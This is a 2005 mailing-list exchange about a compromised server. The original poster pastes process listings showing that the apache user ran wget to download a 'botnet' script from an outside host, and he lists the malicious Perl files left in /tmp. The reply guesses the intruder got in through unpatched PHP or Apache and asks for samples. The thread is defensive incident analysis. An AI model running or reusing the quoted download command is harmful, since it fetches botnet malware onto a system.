[vox-tech] lugod.org cracked?
ME
dugan at passwall.com
Tue Feb 15 12:45:42 PST 2005
Most common trojan/exploit is for irc relays.
Guess for entry? Did you upgrade php and apache after those security holes
were found a while back?
could you send me a copy of the binary files you have found in
/tmp/.image? (Thanks.)
-ME
Rod Roark said:
> I found that something was sucking up all my bandwidth late
> this morning. ps -aux showed this:
>
> apache 3267 0.0 0.0 2560 1024 ? S 11:14 0:00 sh -c
> wget leblocks.sytes.net/botnet | grep abcdeee 2>&1 3>&1
> apache 3268 0.0 0.1 3060 1460 ? S 11:14 0:00 wget
> leblocks.sytes.net/botnet
> apache 3269 0.0 0.0 1416 448 ? S 11:14 0:00 grep
> abcdeee
>
> After killing all processes owned by apache and doing a bit
> of checking around, I found these perl scripts in
> /tmp/.images:
>
> -rw-r--r-- 1 apache apache 20281 Feb 15 12:13 botnet
> -rw-r--r-- 1 apache apache 9592 Oct 12 23:23 pv
> -rw-r--r-- 1 apache apache 9592 Oct 12 23:23 pv.1
>
> They are definitely malicious. Does anyone know what this
> malware is?
>
> -- Rod
> _______________________________________________
> vox-tech mailing list
> vox-tech at lists.lugod.org
> http://lists.lugod.org/mailman/listinfo/vox-tech
>
>
More information about the vox-tech
mailing list